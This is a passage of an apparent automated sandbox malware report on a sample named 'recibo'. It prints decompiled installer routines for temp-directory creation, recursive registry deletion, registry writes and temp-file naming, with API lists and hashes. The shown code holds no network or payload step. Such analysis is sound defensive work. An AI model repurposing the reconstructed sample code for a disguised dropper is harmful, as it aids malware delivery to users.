                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                  • API String ID: 2200240437-1946221925
                                                                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                  • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                  • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1082 405a6e-405ab9 CreateDirectoryW 1083 405abb-405abd 1082->1083 1084 405abf-405acc GetLastError 1082->1084 1085 405ae6-405ae8 1083->1085 1084->1085 1086 405ace-405ae2 SetFileSecurityW 1084->1086 1086->1083 1087 405ae4 GetLastError 1086->1087 1087->1085
                                                                                  C-Code - Quality: 100%
                                                                                  			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                  0x00405a79
                                                                                  0x00405a7d
                                                                                  0x00405a80
                                                                                  0x00405a86
                                                                                  0x00405a8a
                                                                                  0x00405a8e
                                                                                  0x00405a96
                                                                                  0x00405a9d
                                                                                  0x00405aa3
                                                                                  0x00405aaa
                                                                                  0x00405ab1
                                                                                  0x00405ab9
                                                                                  0x00405abb
                                                                                  0x00000000
                                                                                  0x00405abb
                                                                                  0x00405ac5
                                                                                  0x00405acc
                                                                                  0x00405ae2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405ae4
                                                                                  0x00405ae8

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                  • GetLastError.KERNEL32 ref: 00405AC5
                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                  • GetLastError.KERNEL32 ref: 00405AE4
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 3449924974-3355392842
                                                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                  • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                  • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1088 402ea9-402ed2 call 4063aa 1090 402ed7-402edb 1088->1090 1091 402ee1-402ee5 1090->1091 1092 402f8c-402f90 1090->1092 1093 402ee7-402f08 RegEnumValueW 1091->1093 1094 402f0a-402f1d 1091->1094 1093->1094 1095 402f71-402f7f RegCloseKey 1093->1095 1096 402f46-402f4d RegEnumKeyW 1094->1096 1095->1092 1097 402f1f-402f21 1096->1097 1098 402f4f-402f61 RegCloseKey call 40690a 1096->1098 1097->1095 1099 402f23-402f37 call 402ea9 1097->1099 1103 402f81-402f87 1098->1103 1104 402f63-402f6f RegDeleteKeyW 1098->1104 1099->1098 1106 402f39-402f45 1099->1106 1103->1092 1104->1092 1106->1096
                                                                                  C-Code - Quality: 48%
                                                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                  0x00402eb4
                                                                                  0x00402ebd
                                                                                  0x00402ec6
                                                                                  0x00402ed2
                                                                                  0x00402edb
                                                                                  0x00402ee5
                                                                                  0x00402f0a
                                                                                  0x00402f10
                                                                                  0x00402f15
                                                                                  0x00402f16
                                                                                  0x00402f46
                                                                                  0x00402f1f
                                                                                  0x00402f21
                                                                                  0x00402f71
                                                                                  0x00402f74
                                                                                  0x00000000
                                                                                  0x00402f7a
                                                                                  0x00402f30
                                                                                  0x00402f35
                                                                                  0x00402f37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402f3f
                                                                                  0x00402f44
                                                                                  0x00402f45
                                                                                  0x00402f45
                                                                                  0x00402f52
                                                                                  0x00402f5a
                                                                                  0x00402f61
                                                                                  0x00000000
                                                                                  0x00402f8a
                                                                                  0x00000000
                                                                                  0x00402f69
                                                                                  0x00402ef5
                                                                                  0x00402f08
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402f08
                                                                                  0x00402f90

                                                                                  APIs
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 1354259210-0
                                                                                  • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                  • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                  • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                  • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 71541817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1107 71541817-71541856 call 71541bff 1111 71541976-71541978 1107->1111 1112 7154185c-71541860 1107->1112 1113 71541862-71541868 call 7154243e 1112->1113 1114 71541869-71541876 call 71542480 1112->1114 1113->1114 1119 715418a6-715418ad 1114->1119 1120 71541878-7154187d 1114->1120 1121 715418cd-715418d1 1119->1121 1122 715418af-715418cb call 71542655 call 71541654 call 71541312 GlobalFree 1119->1122 1123 7154187f-71541880 1120->1123 1124 71541898-7154189b 1120->1124 1125 715418d3-7154191c call 71541666 call 71542655 1121->1125 1126 7154191e-71541924 call 71542655 1121->1126 1148 71541925-71541929 1122->1148 1129 71541882-71541883 1123->1129 1130 71541888-71541889 call 71542b98 1123->1130 1124->1119 1127 7154189d-7154189e call 71542e23 1124->1127 1125->1148 1126->1148 1141 715418a3 1127->1141 1136 71541885-71541886 1129->1136 1137 71541890-71541896 call 71542810 1129->1137 1138 7154188e 1130->1138 1136->1119 1136->1130 1147 715418a5 1137->1147 1138->1141 1141->1147 1147->1119 1151 71541966-7154196d 1148->1151 1152 7154192b-71541939 call 71542618 1148->1152 1151->1111 1154 7154196f-71541970 GlobalFree 1151->1154 1157 71541951-71541958 1152->1157 1158 7154193b-7154193e 1152->1158 1154->1111 1157->1151 1160 7154195a-71541965 call 715415dd 1157->1160 1158->1157 1159 71541940-71541948 1158->1159 1159->1157 1161 7154194a-7154194b FreeLibrary 1159->1161 1160->1151 1161->1157
                                                                                  C-Code - Quality: 88%
                                                                                  			E71541817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7154506c = _a8;
				 *0x71545070 = _a16;
				 *0x71545074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x71545048, E71541651);
				_push(1); // executed
				_t37 = E71541BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E7154243E(_t54);
					}
					_push(_t54);
					E71542480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E71542655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E71541666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E71542655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E71542655();
							_t37 = GlobalFree(E71541312(E71541654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E71542618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E715415DD( *0x71545068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E71542E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E71542B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E71542810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                                                  0x71541817
                                                                                  0x71541817
                                                                                  0x71541817
                                                                                  0x71541824
                                                                                  0x7154182c
                                                                                  0x71541839
                                                                                  0x71541847
                                                                                  0x7154184a
                                                                                  0x7154184c
                                                                                  0x71541851
                                                                                  0x71541856
                                                                                  0x71541978
                                                                                  0x71541978
                                                                                  0x7154185c
                                                                                  0x71541860
                                                                                  0x71541863
                                                                                  0x71541868
                                                                                  0x71541869
                                                                                  0x7154186a
                                                                                  0x71541870
                                                                                  0x71541876
                                                                                  0x715418a6
                                                                                  0x715418ad
                                                                                  0x715418d1
                                                                                  0x7154191e
                                                                                  0x7154191f
                                                                                  0x715418d3
                                                                                  0x715418d3
                                                                                  0x715418d4
                                                                                  0x715418dd
                                                                                  0x715418de
                                                                                  0x715418e8
                                                                                  0x715418eb
                                                                                  0x715418f0
                                                                                  0x715418f7
                                                                                  0x715418f7
                                                                                  0x715418fd
                                                                                  0x715418fe
                                                                                  0x71541904
                                                                                  0x7154190a
                                                                                  0x71541917
                                                                                  0x71541918
                                                                                  0x7154191b
                                                                                  0x715418af
                                                                                  0x715418af
                                                                                  0x715418b0
                                                                                  0x715418c5
                                                                                  0x715418c5
                                                                                  0x71541929
                                                                                  0x7154192c
                                                                                  0x71541939
                                                                                  0x71541940
                                                                                  0x71541948
                                                                                  0x7154194b
                                                                                  0x7154194b
                                                                                  0x71541948
                                                                                  0x71541958
                                                                                  0x71541960
                                                                                  0x71541965
                                                                                  0x71541958
                                                                                  0x7154196d
                                                                                  0x00000000
                                                                                  0x7154196f
                                                                                  0x71541970
                                                                                  0x00000000
                                                                                  0x71541970
                                                                                  0x7154196d
                                                                                  0x7154187a
                                                                                  0x7154187d
                                                                                  0x7154189b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154189e
                                                                                  0x715418a3
                                                                                  0x715418a3
                                                                                  0x715418a5
                                                                                  0x00000000
                                                                                  0x715418a5
                                                                                  0x7154187f
                                                                                  0x71541880
                                                                                  0x71541888
                                                                                  0x71541889
                                                                                  0x00000000
                                                                                  0x71541889
                                                                                  0x71541882
                                                                                  0x71541883
                                                                                  0x71541891
                                                                                  0x00000000
                                                                                  0x71541891
                                                                                  0x71541886
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541886

                                                                                  APIs
                                                                                    • Part of subcall function 71541BFF: GlobalFree.KERNEL32(?), ref: 71541E74
                                                                                    • Part of subcall function 71541BFF: GlobalFree.KERNEL32(?), ref: 71541E79
                                                                                    • Part of subcall function 71541BFF: GlobalFree.KERNEL32(?), ref: 71541E7E
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 715418C5
                                                                                  • FreeLibrary.KERNEL32(?), ref: 7154194B
                                                                                  • GlobalFree.KERNELBASE(00000000), ref: 71541970
                                                                                    • Part of subcall function 7154243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7154246F
                                                                                    • Part of subcall function 71542810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71541896,00000000), ref: 715428E0
                                                                                    • Part of subcall function 71541666: wsprintfW.USER32 ref: 71541694
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3962662361-3916222277
                                                                                  • Opcode ID: 60f034ea5a3cfc310f27d67c30a8d0326bb4bdbff4298415435a7ebbfaec90c4
                                                                                  • Instruction ID: f6fb769ff49979455742cc5b490b2109d91b991afe5f2e6e9256fab49cb263c5
                                                                                  • Opcode Fuzzy Hash: 60f034ea5a3cfc310f27d67c30a8d0326bb4bdbff4298415435a7ebbfaec90c4
                                                                                  • Instruction Fuzzy Hash: 444109765002069BEB1D9F30E8C8B993BBCBF04354F346466ED5B9E086DB74E084CB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 83%
                                                                                  			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}













                                                                                  0x0040248a
                                                                                  0x0040248a
                                                                                  0x0040248a
                                                                                  0x0040248a
                                                                                  0x0040248d
                                                                                  0x00402494
                                                                                  0x0040249e
                                                                                  0x004024a1
                                                                                  0x004024aa
                                                                                  0x004024b1
                                                                                  0x004024b8
                                                                                  0x004024bb
                                                                                  0x004024c1
                                                                                  0x004024cb
                                                                                  0x004024cf
                                                                                  0x004024da
                                                                                  0x004024da
                                                                                  0x004024e1
                                                                                  0x004024eb
                                                                                  0x004024f1
                                                                                  0x004024f4
                                                                                  0x004024f4
                                                                                  0x004024f8
                                                                                  0x00402504
                                                                                  0x00402504
                                                                                  0x00402515
                                                                                  0x0040251d
                                                                                  0x0040251f
                                                                                  0x0040251f
                                                                                  0x00402522
                                                                                  0x004025fd
                                                                                  0x004025fd
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseValuelstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf321E.tmp
                                                                                  • API String ID: 2655323295-1043476261
                                                                                  • Opcode ID: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
                                                                                  • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                  • Opcode Fuzzy Hash: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
                                                                                  • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                  0x00406062
                                                                                  0x00406068
                                                                                  0x00406069
                                                                                  0x00406069
                                                                                  0x0040606e
                                                                                  0x0040606f
                                                                                  0x00406072
                                                                                  0x00406077
                                                                                  0x0040607a
                                                                                  0x00406084
                                                                                  0x00406091
                                                                                  0x00406095
                                                                                  0x0040609d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004060a1
                                                                                  0x00000000
                                                                                  0x004060a3
                                                                                  0x004060a3
                                                                                  0x004060a3
                                                                                  0x004060a6
                                                                                  0x004060a9
                                                                                  0x004060a9
                                                                                  0x004060ac
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040607A
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                  • API String ID: 1716503409-944333549
                                                                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                  • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                  • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 60%
                                                                                  			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
